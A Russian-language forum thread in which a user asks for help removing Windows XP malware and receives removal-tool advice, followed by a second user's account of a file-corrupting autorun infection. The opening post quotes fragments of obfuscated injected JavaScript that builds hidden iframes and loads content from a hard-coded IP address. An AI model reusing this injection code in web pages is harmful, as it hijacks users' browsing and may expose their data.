Подцепил вирус. нужно лечение.

стоит WinXP. Недавно подцепил какую-то херню. Вирус проявляется в том, что
1)все соединения запрошенные через броузеры отправляются от имени эксплорера. если эксплореру не давать права отправлять запросы-то броузер попросту не открывает страницы.
2)к каждой странице добавляется яваскрипт-код весьма большого веса. Причем после конца документа. содержание примерно такое:

Code:

</body>
</html>
<script type="text/javascript" language="javascript">

    var   AVidFwCHAppNSQXBd=  657 - 30606;
    jYwJhMaYgnUJDUaWHkK = window.onload;
    var oDCQtBcAmfBrLVe =6051 + 9815;
	window.onload = vQtxWTsaEYvWmWG;
	IuGdoqVmjGlcsEPFmVl = 19119;
	
    QgVxFTkTaUKEoKOQ = "";
    var   pcBrqcvdVKCNJBqod=  8777 - 1125;
    xfdNKBQaIwxewaDji = "";
    var EoLCbbpddxQpDnmE =31400;
    AxkgATsgBjXTMbgP = "";

...
...
...

var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};LxwmQqbwQvgXoXOcMF.push(element);
jkrByjMmjyMUFJjm.push(CreateyoVcLstievvEmDpject_24578457887(
'b720x300',
'http://85.12.43.83/fls.geo/HK_720x300_1.html?a=b',
'720', '720', '300', '300',
'',
''));

...
...
...

function rgpnQIURcMJqLABW(yoVcLstievvEmDpj)
	{
	var   dwkIsJxiemdLOHsvD;
		var QwmhGWqlhFNcDDGREQ = document.createElement("IFRAME");
		uQNeqLfJMQjKDvIHc =14043 + 23606;
		QwmhGWqlhFNcDDGREQ.id = yoVcLstievvEmDpj.FrID;
		
		QwmhGWqlhFNcDDGREQ.name = yoVcLstievvEmDpj.FrName; 
		var   VJCWjHMbmWSGgSQrS=  9804 - 3054;
		QwmhGWqlhFNcDDGREQ.framespacing = yoVcLstievvEmDpj.FrSpacing; 
		AoGBPeUgtvOYDlyH =30686 + 26984;
		QwmhGWqlhFNcDDGREQ.frameborder = yoVcLstievvEmDpj.FrBorder; 
		var PmHnbBFMohbAVNtS =12018 + 6157;
		QwmhGWqlhFNcDDGREQ.scrolling = yoVcLstievvEmDpj.FrScrolling ; 
		var JoUkNgWNPNIgjdMwQ =11385 + 14775;
		QwmhGWqlhFNcDDGREQ.width = yoVcLstievvEmDpj.FrWidthMin; 
		var   CdVSHkhAKhMKAQfat;
		QwmhGWqlhFNcDDGREQ.height = yoVcLstievvEmDpj.FrHeightMin;		
		xrtWnsHoNvYDRyrv = 26284;
		QwmhGWqlhFNcDDGREQ.marginWidth = "0";
		gNALKqVNlcgxptLww = 12459;
		QwmhGWqlhFNcDDGREQ.marginHeight = "0";
		
		if(!QwmhGWqlhFNcDDGREQ.frameborder || QwmhGWqlhFNcDDGREQ.frameborder == 'no')
		{
		var oQoHUoKwdVCnsuxuW =15045 + 22871;
		    QwmhGWqlhFNcDDGREQ.style.borderWidth = "0px";
		    var   edPbIDDhuKTTYdxRGW;
		    QwmhGWqlhFNcDDGREQ.frameBorder = '0';
		    var   qiSeLugrjBiiQFlw;
		}			

...
...
...

3)Заметил, что эта суко на некоторых сайтах меняет баннеры на свои. возможн пересылает куда-то данные форм и куки...
4)в автозагрузке появились лишние длл"ки. Удаляю, при загрузке винды они появляются снова.

Фаерволл оутпост и антивирь нод32 с полными обновлениями молчат.
Нужна помощь.

 

У нода полные обновления с офф сайта? или зеркала
2.А, что если загрузиться в safe mod и просканить чем нить типо Sysclean
3. У Аваста например есть сд версия, тобиш грузишся с диска и сканеш хард
http://avast.ru/avast_BART_CD_download.htm

 

неплохо иметь в хозяйстве procmon regmon filemon, ну и хороший антируткит gmer(показывает скрытые файлы/ключи в реестре/и т.д)
посмотри что в сервисах, может есть что левое.

 

ссылочку плз)

1)с оффа
2)ссылочку плз)

 

http://www.trendmicro.com/download/dcs.asp

на аваст ссылка выше)

 

антируткит gmer - ЛАЖА!!!
юзай RkU
Накрайняк AVZ

 

поделись подозрительными dll, мне интересно стало что это за живность

 

уже поздно...вылечился...

 

хех) если уж на то пошло - то все это лажа

 

GALIAFF, avz элита среди этой лажы (так сказать, элитная лажа ))

 

недавно столкнулся с такой проблемой:
по просьбе знакомого зашел посмотреть компьютер который "стал работать не стабильно" с его слов выражалось это в следующем
1) все файлы *.doc, *. xls на диске имеют одинаковый размер и содержут тройственную надпись "Скупой платит дважды" на зараженной машине нашел файл windowssyystem32 mshost.exe так же он висит в процессах размер его 192512 б при добовлении любых носителей выкидывает 3 скрытых файла autoerun.inf *.exe : открыть.exe , последний не отображается и MFT$ не прописан у всех файлов размер 192512 б. При попытке что либо поднять из документов разными способами ни чего не получилось. Как поднять информацию?

 

Воспользуйся far для удаления/изменения файлов типа autorun.inf, process exlporer - для получения путь запущенного модуля, вопрос не понятен.

 

кто советует гмер..
пф... нестабильная фигня ... сколько раз меня в бсод брасала..
avz спасет тебя .. а яндекс поможет найти avz ))

 

проблема уже свершилась спасать не от чего!!! вопрос в другом в начальной части файла где содержится информация о размере файла его структуре и прочие служебные данные лежит информация не цензурного содержания!!! размер файлов один! возможности сравнения контрольных сумм нету! нужна программа дешифратор или что-то вроде неё от вируса избавиться не проблема проблема, в том как восстановить информацию??

 

N1K70

avz чистенько меня спасала, что не знаю лажа или нет.
там много полезных функций против заразы и рутиков.

 

решением проблемы является простой инженерный калькулятор ищем место где храниться информация о размере файла в Hex редакторе заменяем на необходимое значение и почти все далее все идет как по маслу почти все поднял